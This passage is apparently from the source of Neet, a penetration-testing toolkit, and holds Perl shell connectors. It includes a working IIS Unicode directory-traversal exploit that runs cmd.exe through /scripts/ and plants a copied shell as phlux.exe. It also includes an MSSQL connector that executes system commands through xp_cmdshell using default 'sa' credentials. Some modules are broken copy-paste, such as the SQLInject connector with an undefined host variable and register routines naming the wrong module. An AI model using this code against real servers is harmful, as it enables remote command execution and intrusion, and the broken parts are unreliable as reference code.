      @{$$self{'data'}}=@data;
      $$self{'source'}=$source;
    }
  }
  return $success;
}

1;

--------------------------------------------------------------------------------
/content/main/JR/iShell/ConnectorCPCE.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# JR::ConnectorCPCE.pm

# This is the CPCE connector for the ishell command shell framework.
# Jonathan Roach

# It uses CPCE in pure PERL to provide access to a remote box via JR's CPCE mechanism

# All connectors should provide the same base interface to the calling iShell.
# new -> create a new instance of the connector. This should only return a connector object
#   if the initial connection succeeds
# test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or
#   otherwise 0
# execute -> execute this system command - returns an array of output
# ServerTime -> get the date/time from the server
# OS -> get the OS version
# Server -> get the Server version
# Args -> return a hash of parameters that should be supplied.
# BaseDir -> get the directory that the exploited service is based
# Environment -> get a hash of the environment variables
# disconnect -> Close the connection

package JR::iShell::ConnectorCPCE;
use JR::Process::RemoteCommandExecution;

sub new {
  my $PKG=shift();
  my %CPCE=@_;

  my %RequiredArgs;
  $RequiredArgs{'Args'}="Host Port Key KeyFile";
  $RequiredArgs{'Optional'}="Host Port Key KeyFile";
  $RequiredArgs{'Mandatory'}="";
  $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1";
  $RequiredArgs{'Defaults'}{'Port'}="65467";
  $RequiredArgs{'Defaults'}{'Key'}="123123";

  my %Connector;
  $CPCE{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$CPCE{"Host"});
  $CPCE{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$CPCE{"Port"});
  $CPCE{"Key"}="$RequiredArgs{'Defaults'}{'Key'}" if (!$CPCE{"Key"});
  my $Client;
  if (!defined($CPCE{'KeyFile'})){
    $Client=CPCEClient->new('ServerAddr'=>$CPCE{"Host"}, 'CPCEPort'=>$CPCE{"Port"}, 'Key'=>$CPCE{'Key'});
  } else {
    $Client=CPCEClient->new('ServerAddr'=>$CPCE{"Host"}, 'CPCEPort'=>$CPCE{"Port"}, 'KeyFile'=>$CPCE{'KeyFile'});
  }
  if ($Client){
    $CPCE{"Connected"}=1;
    $CPCE{'Handle'}=$Client;
  } else {
    return undef;
  }
  $CPCE{'Type'}="Windows";
  $CPCE{'RequiredArgs'}=\%RequiredArgs;

  my $ConnectorObject=\%CPCE;
  bless $ConnectorObject, $PKG;
  return $ConnectorObject;
}

sub test {
  my $OBJ=shift();
  my $out=$OBJ->execute("ver");
  if ($out){
    return 1;
  }
  return 0;
}

sub execute {
  my $OBJ=shift();
  my $command=shift();
  my $Client=${$OBJ}{'Handle'};
  my @result;
  my $output=$Client->RemoteExec("$command");
  @result = split /\n/, $output if ($output);
  return @result;
}

sub ServerTime {
  my $OBJ=shift();
  my @result=$OBJ->execute("echo . | date");
  my $date=$result[0];
  $date=substr($date,index($date,"is:")+4,length($date)-(index($date,"is:")+4));
  @result=$OBJ->execute("echo . | time");
  my $time=$result[0];
  $time=substr($time,index($time,"is:")+4,length($time)-(index($time,"is:")+4));
  return "$date$time";
}

sub OS {
  my $OBJ=shift();
  my @result=$OBJ->execute("ver");
  return $result[1];
}

sub Args {
  my $OBJ=shift();
  return %{$$OBJ{'RequiredArgs'}};
}

sub Server {
  my $OBJ=shift();
  my @result=$OBJ->execute("ver");
  return $result[1];
}

sub BaseDir {
  my $OBJ=shift();
  my @result=$OBJ->execute("cd");
  return $result[0];
}

sub Environment {
  my $OBJ=shift();
  my @result=$OBJ->execute("set");
  my %env;
  for my $line (@result){
    next if (!$line);
    my ($var,$val)=split "=", $line;
    $env{$var}=$val;
  }
  return %env;
}

sub disconnect {
  my $OBJ=shift();
  return 0;
}

sub close {
  my $OBJ=shift();
  return disconnect($OBJ);
}

sub register {
  # Gets called at installation time
  eval {
    require JR::Catalog;
  };
  if ($@){
    print STDERR "Couldn't load JR::Catalog. Didn't register.\n";
    return 0;
  }
  my $reg=Catalog->new;
  if (!$reg->isRegistered("Module"=>"ConnectorNativeMSSQL")){
    return $reg->Register("Type"=>"iShellConnector","Object"=>"NativeMSSQL","Module"=>"ConnectorNativeMSSQL");
  }
  return 0;
}

1;

--------------------------------------------------------------------------------
/content/main/JR/iShell/ConnectorIISUnicode.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# JR::ConnectorIISUnicode.pm

# This is the "IIS Unicode" connector for the ishell command shell framework.
# Jonathan Roach

# It uses HTTP/HTTPS to obtain command execution on vulnerable hosts.

# All connectors should provide the same base interface to the calling iShell.
# new -> create a new instance of the connector. This should only return a connector object
#   if the initial connection succeeds
# test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or
#   otherwise 0
# execute -> execute this system command - returns an array of output
# ServerTime -> get the date/time from the server
# OS -> get the OS version
# Server -> get the Server version
# Args -> return a hash of parameters that should be supplied.
# BaseDir -> get the directory that the exploited service is based
# Environment -> get a hash of the environment variables
# disconnect -> Close the connection


use strict;

package JR::iShell::ConnectorIISUnicode;
use IO::Socket;
use JR::Parsers::OutputIsolator;

sub new {
  my $PKG=shift();
  my %IISServer=@_;
  my %Connector;

  my %RequiredArgs;
  $RequiredArgs{'Args'}="Host Port SSL";
  $RequiredArgs{'Optional'}="Host Port SSL";
  $RequiredArgs{'Mandatory'}="";
  $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1";
  $RequiredArgs{'Defaults'}{'Port'}="80";
  $RequiredArgs{'Defaults'}{'SSL'}="0";

  $IISServer{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$IISServer{"Host"});
  $IISServer{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$IISServer{"Port"});
  $IISServer{'SSL'}="$RequiredArgs{'Defaults'}{'SSL'}" if (!$IISServer{"SSL"});

  $IISServer{'Type'}="Windows";
  $IISServer{'SysPath'}="..%255c..%255c..%255cwinnt/system32/";
  $IISServer{'Path'}=$IISServer{'SysPath'};
  $IISServer{'CommandInterpreter'}="cmd.exe";
  $IISServer{'RequiredArgs'}=\%RequiredArgs;

  $IISServer{'HTMLobj'}=new OutputIsolator();
  my $ConnectorObject=\%IISServer;
  bless $ConnectorObject, $PKG;
  return $ConnectorObject;
}

sub test {
  my $IISServer=shift();
  my $OutputIsolator=$$IISServer{'HTMLobj'};
  my
    $teststring="__OutputIsolatorCalibration__OICalibrate__"x3;
  for (my $a=0; $a<10; $a++){
    # This is not required to be cryptographically strong!! :-)
    $teststring .= int(rand(1000));
  }
  print "Calibrating...\n";
  until ($OutputIsolator->isCalibrated){
    $OutputIsolator->LoadPage($IISServer->_subSubmit("echo $teststring"));
    $OutputIsolator->Calibrate("$teststring");
  }
  #print "Calibrated at " . $$OutputIsolator{'Index'} . "\n";
  my $Base=$IISServer->BaseDir;
  $$IISServer{'Base'}=$Base;

  # Now get a command shell we can use
  my $tempshell="phlux.exe";
  print "Getting our own command shell...\n";
  $IISServer->execute("if exist $Base\\tmp.exe del $Base\\tmp.exe");
  $IISServer->execute("copy C:\\winnt\\system32\\cmd.exe $Base\\$tempshell");
  my @results=$IISServer->execute("dir");
  my $ok=0;
  for my $line (@results){
    if ($line =~ /\s$tempshell$/){
      $ok=1;
    }
  }
  if ($ok){
    $$IISServer{'Path'}="";
    $$IISServer{'CommandInterpreter'}="$tempshell";
  }
  return $ok;
}

sub execute {
  my $IISServer=shift();
  my $OutputIsolator=$$IISServer{'HTMLobj'};
  my $fullcommand=shift();
  my $exe=$$IISServer{'CommandInterpreter'};
  my $path=$$IISServer{'Path'};
  my @commands = split "&&", $fullcommand;
  my @newcommand;
  for my $command (@commands){
    $command =~ s/^\s+//;
    if ($command =~ /xcopy /){
      $exe="xcopy.exe";
      $path=$$IISServer{'SysPath'};
      $command =~ s/xcopy //;
      pop @newcommand;
    }
    if ($command =~ /net /){
      $exe="net.exe";
      $path=$$IISServer{'SysPath'};
      $command =~ s/net //;
      pop @newcommand;
    }
    if ($command =~ /net1 /){
      $exe="net1.exe";
      $path=$$IISServer{'SysPath'};
      $command =~ s/net1 //;
      pop @newcommand;
    }
    if ($command =~ /attrib /){
      $exe="attrib.exe";
      $path=$$IISServer{'SysPath'};
      $command =~ s/attrib //;
      pop @newcommand;
    }
    push @newcommand, $command;
  }
  my $command=join "&& ", @newcommand;
  $command = "/c+" . $command if (("$exe" eq "$$IISServer{'CommandInterpreter'}") || ("$exe" eq "cmd.exe"));
  $exe = $path . $exe;
  my $cmd="/scripts/" . $exe . "?$command";
  my @res=$IISServer->httpget($cmd);
  $OutputIsolator->LoadPage(@res);
  my @results=$OutputIsolator->GetOutput;
  return @results;
}

sub _subSubmit {
  my $IISServer=shift();
  my $command=shift();
  my $exe=$$IISServer{'Path'} . $$IISServer{'CommandInterpreter'};
  my $cmd="/scripts/" . $exe . "?/c+$command";
  my @result=$IISServer->httpget($cmd);
  return @result;
}

sub ServerTime {
  my $OBJ=shift();
  return $$OBJ{'Date'};
}

sub OS {
  my $OBJ=shift();
  my @result=$OBJ->execute("ver");
  return $result[1];
}

sub Args {
  my $OBJ=shift();
  return %{$$OBJ{'RequiredArgs'}};
}

sub Server {
  my $OBJ=shift();
  return $$OBJ{'Server'};
}

sub BaseDir {
  my $OBJ=shift();
  my @result=$OBJ->execute("cd");
  return $result[0];
}

sub Environment {
  my $OBJ=shift();
  my @result=$OBJ->execute("set");
  my %env;
  for my $line (@result){
    next if (!$line);
    my ($var,$val)=split "=", $line;
    $env{$var}=$val;
  }
  return %env;
}

sub disconnect {
  my $OBJ=shift();
  return 1;
}

sub close {
  my $OBJ=shift();
  return disconnect($OBJ);
}

sub httpget {
  my $IISServer=shift();
  my $Host=$$IISServer{'Host'};
  my $Port=$$IISServer{'Port'};
  my $cmd = urlencode(shift());
  my $headercount=0; my $timeout=10; my $tries=0;
  my $headers="Connection: Keep-Alive\r\n";
  my
    @output;
  while (!$headercount){
    $tries++;
    my $socket = IO::Socket::INET->new('PeerAddr'=>"$Host", 'PeerPort'=>"$Port", 'Proto'=>'tcp', 'Blocking'=>'1', 'Timeout'=>'10');
    print $socket "GET $cmd HTTP/1.1\r\nHost: $Host\r\n$headers\r\n";
    my @raw=<$socket>;
    $socket->close;
    my $head=1;
    for my $line (@raw){
      if ($line !~ /\S/){
        $head=0;
        next;
      }
      if ($head){
        $headercount++;
        if ($line =~ /^Server: /){
          $line =~ s/[\r\n]//g;
          $$IISServer{'Server'}=substr($line,index($line," ")+1,length($line)-index($line," "));
        }
        if ($line =~ /^Date: /){
          $line =~ s/[\r\n]//g;
          $$IISServer{'Date'}=substr($line,index($line," ")+1,length($line)-index($line," "));
        }
      } else {
        push @output, $line;
      }
    }
    if ($tries > $timeout) {
      print STDERR ("Couldn't get HTTP response\n");
      sleep 5;
      return undef;
    }
  }
  return @output;
}

sub urlencode {
  my $string=shift();
  $string =~ s/ /%20/g;
  $string =~ s/&/%26/g;
  return $string;
}


sub register {
  # Gets called at installation time
  eval {
    require JR::Catalog;
  };
  if ($@){
    print STDERR "Couldn't load JR::Catalog. Didn't register.\n";
    return 0;
  }
  my $reg=Catalog->new;
  if (!$reg->isRegistered("Module"=>"ConnectorIISUnicode")){
    return $reg->Register("Type"=>"iShellConnector","Object"=>"IISUnicode","Module"=>"ConnectorIISUnicode");
  }
  return 0;
}

1;

--------------------------------------------------------------------------------
/content/main/JR/iShell/ConnectorNativeMSSQL.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# JR::ConnectorNativeMSSQL.pm

# This is the "Native MSSQL" connector for the ishell command shell framework.
# Jonathan Roach

# It uses DBI, DBD::Sybase and FreeTDS to provide
# access to MS-SQL via the TDS protocol (a la TCP/1433 access).

# All connectors should provide the same base interface to the calling iShell.
# new -> create a new instance of the connector. This should only return a connector object
#   if the initial connection succeeds
# test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or
#   otherwise 0
# execute -> execute this system command - returns an array of output
# ServerTime -> get the date/time from the server
# OS -> get the OS version
# Server -> get the Server version
# Args -> return a hash of parameters that should be supplied.
# BaseDir -> get the directory that the exploited service is based
# Environment -> get a hash of the environment variables
# disconnect -> Close the connection

package JR::iShell::ConnectorNativeMSSQL;
use DBI;

sub new {
  my $PKG=shift();
  my %SQLServer=@_;
  my %RequiredArgs;
  $RequiredArgs{'Args'}="Host Port User Pass";
  $RequiredArgs{'Optional'}="Host Port User Pass";
  $RequiredArgs{'Mandatory'}="";
  $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1";
  $RequiredArgs{'Defaults'}{'Port'}="1433";
  $RequiredArgs{'Defaults'}{'User'}="sa";
  $RequiredArgs{'Defaults'}{'Pass'}="";

  my %Connector;
  $SQLServer{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$SQLServer{"Host"});
  $SQLServer{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$SQLServer{"Port"});
  $SQLServer{"User"}="$RequiredArgs{'Defaults'}{'User'}" if (!$SQLServer{"User"});
  $SQLServer{"Pass"}="$RequiredArgs{'Defaults'}{'Pass'}" if (!$SQLServer{"Pass"});
  my $server = "dbi:Sybase:server=" . $SQLServer{'Host'} . ":" .
$SQLServer{'Port'}; 66 | 67 | my $dbh = DBI->connect($server,$SQLServer{'User'},$SQLServer{'Pass'}); 68 | if ($dbh){ 69 | $SQLServer{"Handle"}=$dbh; 70 | $SQLServer{"Connected"}=1; 71 | } else { 72 | return undef; 73 | } 74 | $SQLServer{'Type'}="Windows"; 75 | $SQLServer{'RequiredArgs'}=\%RequiredArgs; 76 | 77 | my $ConnectorObject=\%SQLServer; 78 | bless $ConnectorObject, $PKG; 79 | return $ConnectorObject; 80 | } 81 | 82 | sub test { 83 | my $OBJ=shift(); 84 | my @res=$OBJ->execute("ver"); 85 | if ($#res <0){ 86 | return 0; 87 | } 88 | return 1; 89 | } 90 | 91 | sub runsql { 92 | my $OBJ=shift(); 93 | my $sql=shift(); 94 | my $dbh=${$OBJ}{'Handle'}; 95 | my @result; 96 | my $sth = $dbh->prepare("$sql"); 97 | my $rv = $sth->execute; 98 | my @tmpresults; 99 | while (@tmpresults=$sth->fetchrow_array){ 100 | for my $row (@tmpresults){ 101 | if ($row){ 102 | push @result, $row; 103 | } else { 104 | push @result, ""; 105 | } 106 | } 107 | } 108 | $sth->finish; 109 | return @result; 110 | } 111 | 112 | 113 | sub execute { 114 | my $OBJ=shift(); 115 | my $command=shift(); 116 | my $dbh=${$OBJ}{'Handle'}; 117 | my @result; 118 | $command =~ s/\]/\]\]/g; 119 | my $sth = $dbh->prepare("EXEC master..xp_cmdshell [$command]"); 120 | my $rv = $sth->execute; 121 | my @tmpresults; 122 | while (@tmpresults=$sth->fetchrow_array){ 123 | for my $row (@tmpresults){ 124 | if ($row){ 125 | push @result, $row; 126 | } else { 127 | push @result, ""; 128 | } 129 | } 130 | } 131 | $sth->finish; 132 | return @result; 133 | } 134 | 135 | sub ServerTime { 136 | my $OBJ=shift(); 137 | my @result=$OBJ->execute("date"); 138 | my $date=$result[0]; 139 | $date=substr($date,index($date,"is:")+4,length($date)-(index($date,"is:")+4)); 140 | @result=$OBJ->execute("time"); 141 | my $time=$result[0]; 142 | $time=substr($time,index($time,"is:")+4,length($time)-(index($time,"is:")+4)); 143 | return "$date$time"; 144 | } 145 | 146 | sub OS { 147 | my $OBJ=shift(); 148 | my @result=$OBJ->execute("ver"); 149 
  return $result[1];
}

sub Args {
  my $OBJ=shift();
  return %{$$OBJ{'RequiredArgs'}};
}

sub Server {
  my $OBJ=shift();
  my $dbh=${$OBJ}{'Handle'};
  my @result;
  my $sth = $dbh->prepare("select @\@version");
  my $rv = $sth->execute;
  my @tmpresults;
  while (@tmpresults=$sth->fetchrow_array){
    for my $row (@tmpresults){
      if ($row){
        push @result, $row;
      } else {
        push @result, "";
      }
    }
  }
  $sth->finish;
  return $result[0];
}

sub BaseDir {
  my $OBJ=shift();
  my @result=$OBJ->execute("cd");
  return $result[0];
}

sub Environment {
  my $OBJ=shift();
  my @result=$OBJ->execute("set");
  my %env;
  for my $line (@result){
    next if (!$line);
    my ($var,$val)=split "=", $line;
    $env{$var}=$val;
  }
  return %env;
}

sub disconnect {
  my $OBJ=shift();
  my $dbh=${$OBJ}{'Handle'};
  return $dbh->disconnect;
}

sub close {
  my $OBJ=shift();
  return disconnect($OBJ);
}

sub register {
  # Gets called at installation time
  eval {
    require JR::Catalog;
  };
  if ($@){
    print STDERR "Couldn't load JR::Catalog. Didn't register.\n";
    return 0;
  }
  my $reg=Catalog->new;
  if (!$reg->isRegistered("Module"=>"ConnectorNativeMSSQL")){
    return $reg->Register("Type"=>"iShellConnector","Object"=>"NativeMSSQL","Module"=>"ConnectorNativeMSSQL");
  }
  return 0;
}

1;

--------------------------------------------------------------------------------
/content/main/JR/iShell/ConnectorRCE.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# JR::ConnectorRCE.pm

# This is the RCE connector for the ishell command shell framework.
# Jonathan Roach

# It uses RCE in pure PERL to provide access to a remote box via JR's RCE mechanism

# All connectors should provide the same base interface to the calling iShell.
# new -> create a new instance of the connector. This should only return a connector object
#        if the initial connection succeeds
# test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or
#        otherwise 0
# execute -> execute this system command - returns an array of output
# ServerTime -> get the date/time from the server
# OS -> get the OS version
# Server -> get the Server version
# Args -> return a hash of parameters that should be supplied.
# BaseDir -> get the directory that the exploited service is based
# Environment -> get a hash of the environment variables
# disconnect -> Close the connection

package JR::iShell::ConnectorRCE;
use JR::Process::RCE;

sub new {
  my $PKG=shift();
  my %RCE=@_;

  my %RequiredArgs;
  $RequiredArgs{'Args'}="Host Port Key KeyFile";
  $RequiredArgs{'Optional'}="Host Port Key KeyFile";
  $RequiredArgs{'Mandatory'}="";
  $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1";
  $RequiredArgs{'Defaults'}{'Port'}="65467";
  $RequiredArgs{'Defaults'}{'Key'}="123123";

  my %Connector;
  $RCE{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$RCE{"Host"});
  $RCE{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$RCE{"Port"});
  $RCE{"Key"}="$RequiredArgs{'Defaults'}{'Key'}" if (!$RCE{"Key"});
  my $rce;
  if (!defined($RCE{'KeyFile'})){
    $rce=RCE->new('ServerAddr'=>$RCE{"Host"}, 'RCEPort'=>$RCE{"Port"}, 'Key'=>$RCE{'Key'});
  } else {
    $rce=RCE->new('ServerAddr'=>$RCE{"Host"}, 'RCEPort'=>$RCE{"Port"}, 'KeyFile'=>$RCE{'KeyFile'});
  }
  if ($rce){
    $RCE{"Connected"}=1;
    $RCE{'Handle'}=$rce;
  } else {
    return undef;
  }
  $RCE{'Type'}="Windows";
  $RCE{'RequiredArgs'}=\%RequiredArgs;

  my $ConnectorObject=\%RCE;
  bless $ConnectorObject, $PKG;
  return $ConnectorObject;
}

sub test {
  my $OBJ=shift();
  my $out=$OBJ->execute("ver");
  if ($out){
    return 1;
  }
  return 0;
}

sub execute {
  my $OBJ=shift();
  my $command=shift();
  my $rce=${$OBJ}{'Handle'};
  my @result;
  my $output=$rce->Execute("$command");
  @result = split /\n/, $output if ($output);
  return @result;
}

sub ServerTime {
  my $OBJ=shift();
  my @result=$OBJ->execute("echo . | date");
  my $date=$result[0];
  $date=substr($date,index($date,"is:")+4,length($date)-(index($date,"is:")+4));
  @result=$OBJ->execute("echo . | time");
  my $time=$result[0];
  $time=substr($time,index($time,"is:")+4,length($time)-(index($time,"is:")+4));
  return "$date$time";
}

sub OS {
  my $OBJ=shift();
  my @result=$OBJ->execute("ver");
  return $result[1];
}

sub Args {
  my $OBJ=shift();
  return %{$$OBJ{'RequiredArgs'}};
}

sub Server {
  my $OBJ=shift();
  my @result=$OBJ->execute("ver");
  return $result[1];
}

sub BaseDir {
  my $OBJ=shift();
  my @result=$OBJ->execute("cd");
  return $result[0];
}

sub Environment {
  my $OBJ=shift();
  my @result=$OBJ->execute("set");
  my %env;
  for my $line (@result){
    next if (!$line);
    my ($var,$val)=split "=", $line;
    $env{$var}=$val;
  }
  return %env;
}

sub disconnect {
  my $OBJ=shift();
  return 0;
}

sub close {
  my $OBJ=shift();
  return disconnect($OBJ);
}

sub register {
  # Gets called at installation time
  eval {
    require JR::Catalog;
  };
  if ($@){
    print STDERR "Couldn't load JR::Catalog. Didn't register.\n";
    return 0;
  }
  my $reg=Catalog->new;
  if (!$reg->isRegistered("Module"=>"ConnectorNativeMSSQL")){
    return $reg->Register("Type"=>"iShellConnector","Object"=>"NativeMSSQL","Module"=>"ConnectorNativeMSSQL");
  }
  return 0;
}

1;

--------------------------------------------------------------------------------
/content/main/JR/iShell/ConnectorSQLInject.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# JR::ConnectorSQLInject.pm

# This is the "IIS Unicode" connector for the ishell command shell framework.
# Jonathan Roach

# It uses HTTP/HTTPS to obtain command execution on vulnerable hosts.

# All connectors should provide the same base interface to the calling iShell.
# new -> create a new instance of the connector. This should only return a connector object
#        if the initial connection succeeds
# test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or
#        otherwise 0
# execute -> execute this system command - returns an array of output
# ServerTime -> get the date/time from the server
# OS -> get the OS version
# Server -> get the Server version
# Args -> return a hash of parameters that should be supplied.
# BaseDir -> get the directory that the exploited service is based
# Environment -> get a hash of the environment variables
# disconnect -> Close the connection


use strict;

package JR::iShell::ConnectorSQLInject;
use IO::Socket;
use JR::iShell::OutputIsolator;

sub new {
  my $PKG=shift();
  my %SQLSite=@_;
  my %Connector;

  my %RequiredArgs;
  $RequiredArgs{'Args'}="URL SSL";
  $RequiredArgs{'Optional'}="SSL";
  $RequiredArgs{'Mandatory'}="URL";
  $RequiredArgs{'Defaults'}{'SSL'}="0";
  $RequiredArgs{'Defaults'}{'URL'}="http://localhost/";

  $SQLSite{"URL"}="$RequiredArgs{'Defaults'}{'URL'}" if (!$SQLSite{"URL"});
  $SQLSite{'SSL'}="$RequiredArgs{'Defaults'}{'SSL'}" if (!$SQLSite{"SSL"});

  $SQLSite{'Type'}="Windows";
  $SQLSite{'SysPath'}="..%255c..%255c..%255cwinnt/system32/";
  $SQLSite{'Path'}=$SQLSite{'SysPath'};
  $SQLSite{'CommandInterpreter'}="cmd.exe";
  $SQLSite{'RequiredArgs'}=\%RequiredArgs;

  $SQLSite{'HTMLobj'}=new OutputIsolator();
  my $ConnectorObject=\%SQLSite;
  bless $ConnectorObject, $PKG;
  return $ConnectorObject;
}

sub test {
  print "TESTING\n";
  my $SQLSite=shift();
  my $OutputIsolator=$$SQLSite{'HTMLobj'};
  my $teststring="__OutputIsolatorCalibration__OICalibrate__"x3;
  for (my $a=0; $a<10; $a++){
    # This is not required to be cryptographically strong!! :-)
    $teststring .= int(rand(1000));
  }
  print "Calibrating...\n";
  until ($OutputIsolator->isCalibrated){
    $OutputIsolator->LoadPage($SQLSite->_subSubmit("echo $teststring"));
    $OutputIsolator->Calibrate("$teststring");
  }
  print "Calibrated at " . $$OutputIsolator{'Index'} . "\n";

  my @results=$SQLSite->execute("ver");
  my $ok=0;
  for my $line (@results){
    if ($line =~ /^Microsoft/){
      $ok=1;
    }
  }
  return $ok;
}

sub execute {
  my $SQLSite=shift();
  my $OutputIsolator=$$SQLSite{'HTMLobj'};
  my $fullcommand=shift();
  my $exe=$$SQLSite{'CommandInterpreter'};
  my $path=$$SQLSite{'Path'};
  my @commands = split "&&", $fullcommand;
  my @newcommand;
  for my $command (@commands){
    $command =~ s/^\s+//;
    if ($command =~ /xcopy /){
      $exe="xcopy.exe";
      $path=$$SQLSite{'SysPath'};
      $command =~ s/xcopy //;
      pop @newcommand;
    }
    if ($command =~ /net /){
      $exe="net.exe";
      $path=$$SQLSite{'SysPath'};
      $command =~ s/net //;
      pop @newcommand;
    }
    if ($command =~ /net1 /){
      $exe="net1.exe";
      $path=$$SQLSite{'SysPath'};
      $command =~ s/net1 //;
      pop @newcommand;
    }
    if ($command =~ /attrib /){
      $exe="attrib.exe";
      $path=$$SQLSite{'SysPath'};
      $command =~ s/attrib //;
      pop @newcommand;
    }
    push @newcommand, $command;
  }
  my $command=join "&& ", @newcommand;
  $command = "/c+" . $command if (("$exe" eq "$$SQLSite{'CommandInterpreter'}") || ("$exe" eq "cmd.exe"));
  $exe = $path . $exe;
  my $cmd="/scripts/" . $exe . "?$command";
  my @res=$SQLSite->httpget($cmd);
  $OutputIsolator->LoadPage(@res);
  my @results=$OutputIsolator->GetOutput;
  return @results;
}

sub _subSubmit {
  my $SQLSite=shift();
  my $command=shift();
  my $exe=$$SQLSite{'Path'} . $$SQLSite{'CommandInterpreter'};
  my $cmd="/scripts/" . $exe . "?/c+$command";
  my @result=$SQLSite->httpget($cmd);
  return @result;
}

sub ServerTime {
  my $OBJ=shift();
  return $$OBJ{'Date'};
}

sub OS {
  my $OBJ=shift();
  my @result=$OBJ->execute("ver");
  return $result[1];
}

sub Args {
  my $OBJ=shift();
  return %{$$OBJ{'RequiredArgs'}};
}

sub Server {
  my $OBJ=shift();
  return $$OBJ{'Server'};
}

sub BaseDir {
  my $OBJ=shift();
  my @result=$OBJ->execute("cd");
  return $result[0];
}

sub Environment {
  my $OBJ=shift();
  my @result=$OBJ->execute("set");
  my %env;
  for my $line (@result){
    next if (!$line);
    my ($var,$val)=split "=", $line;
    $env{$var}=$val;
  }
  return %env;
}

sub disconnect {
  my $OBJ=shift();
  return 1;
}

sub close {
  my $OBJ=shift();
  return disconnect($OBJ);
}

sub httpget {
  my $SQLSite=shift();
  my $URL=$$SQLSite{'URL'};
  my $Port=80;
  my @urltokens=split "/", $URL;



  my $cmd = urlencode($URL);
  my $headercount=0; my $timeout=10; my $tries=0;
  my $headers="Connection: Keep-Alive\r\n";
  my @output;


  while (!$headercount){
    $tries++;
    my $socket = IO::Socket::INET->new('PeerAddr'=>"$Host", 'PeerPort'=>"$Port", 'Proto'=>'tcp', 'Blocking'=>'1', 'Timeout'=>'10');
    print $socket "GET $cmd HTTP/1.1\r\nHost: $Host\r\n$headers\r\n";
    my @raw=<$socket>;
    $socket->close;
    my $head=1;
    for my $line (@raw){
      if ($line !~ /\S/){
        $head=0;
        next;
      }
      if ($head){
        $headercount++;
        if ($line =~ /^Server: /){
          $line =~ s/[\r\n]//g;
          $$SQLSite{'Server'}=substr($line,index($line," ")+1,length($line)-index($line," "));
        }
        if ($line =~ /^Date: /){
          $line =~ s/[\r\n]//g;
          $$SQLSite{'Date'}=substr($line,index($line," ")+1,length($line)-index($line," "));
        }
      } else {
        push @output, $line;
      }
    }
    if ($tries > $timeout) {
      print STDERR ("Couldn't get HTTP response\n");
      sleep 5;
      return undef;
    }
  }
  return @output;
}

sub urlencode {
  my $string=shift();
  $string =~ s/ /%20/g;
  $string =~ s/&/%26/g;
  return $string;
}


sub register {
  # Gets called at installation time
  eval {
    require JR::Catalog;
  };
  if ($@){
    print STDERR "Couldn't load JR::Catalog. Didn't register.\n";
    return 0;
  }
